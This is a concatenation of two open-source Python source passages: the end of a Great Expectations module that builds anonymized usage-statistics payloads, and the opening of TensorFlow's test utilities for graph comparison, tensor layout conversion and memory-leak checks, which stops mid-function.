f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, edit_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def add_datasource_usage_statistics(
data_context: "DataContext", name: str, **kwargs # noqa: F821
) -> dict:
if not data_context._usage_statistics_handler:
return {}
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
from great_expectations.core.usage_statistics.anonymizers.datasource_anonymizer import (
DatasourceAnonymizer,
)
aggregate_anonymizer = Anonymizer(salt=data_context_id)
datasource_anonymizer = DatasourceAnonymizer(
salt=data_context_id, aggregate_anonymizer=aggregate_anonymizer
)
payload = {}
# noinspection PyBroadException
try:
payload = datasource_anonymizer._anonymize_datasource_info(name, kwargs)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, add_datasource_usage_statistics: Unable to create add_datasource_usage_statistics payload field"
)
return payload
# noinspection SpellCheckingInspection
def get_batch_list_usage_statistics(
data_context: "DataContext", *args, **kwargs # noqa: F821
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer: Anonymizer = ( # noqa: F821
data_context._usage_statistics_handler.anonymizer
)
payload = anonymizer.anonymize(*args, **kwargs)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, get_batch_list_usage_statistics: Unable to create anonymized_batch_request payload field"
)
return payload
# noinspection PyUnusedLocal
def get_checkpoint_run_usage_statistics(
checkpoint: "Checkpoint", # noqa: F821
*args,
**kwargs,
) -> dict:
usage_statistics_handler: Optional[
UsageStatisticsHandler
] = checkpoint._usage_statistics_handler
data_context_id: Optional[str] = None
try:
data_context_id = checkpoint.data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer: Optional[Anonymizer] = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload: dict = {}
if usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer = usage_statistics_handler.anonymizer # noqa: F821
resolved_runtime_kwargs: dict = (
CheckpointConfig.resolve_config_using_acceptable_arguments(
*(checkpoint,), **kwargs
)
)
payload: dict = anonymizer.anonymize(
*(checkpoint,), **resolved_runtime_kwargs
)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, get_checkpoint_run_usage_statistics: Unable to create anonymized_checkpoint_run payload field"
)
return payload
def get_profiler_run_usage_statistics(
profiler: "RuleBasedProfiler", # noqa: F821
variables: Optional[dict] = None,
rules: Optional[dict] = None,
*args,
**kwargs,
) -> dict:
usage_statistics_handler: Optional[
UsageStatisticsHandler
] = profiler._usage_statistics_handler
data_context_id: Optional[str] = None
if usage_statistics_handler:
data_context_id = usage_statistics_handler._data_context_id
anonymizer: Optional[Anonymizer] = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload: dict = {}
if usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer = usage_statistics_handler.anonymizer
resolved_runtime_config: "RuleBasedProfilerConfig" = ( # noqa: F821
RuleBasedProfilerConfig.resolve_config_using_acceptable_arguments(
profiler=profiler,
variables=variables,
rules=rules,
)
)
payload: dict = anonymizer.anonymize(obj=resolved_runtime_config)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, get_profiler_run_usage_statistics: Unable to create anonymized_profiler_run payload field"
)
return payload
def send_usage_message(
data_context: "DataContext", # noqa: F821
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
) -> None:
"""send a usage statistics message."""
# noinspection PyBroadException
try:
handler: UsageStatisticsHandler = getattr(
data_context, "_usage_statistics_handler", None
)
message: dict = {
"event": event,
"event_payload": event_payload,
"success": success,
}
if handler is not None:
handler.emit(message)
except Exception:
pass
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# Make sure any registered functions are cleaned up in the C++ runtime.
registered_function_names = context.context().list_function_names()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# There should be no newly registered functions hanging around.
leftover_functions = (
context.context().list_function_names() - registered_function_names)
assert not leftover_functions, (
"The following functions were newly created: %s" %
leftover_functions)
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
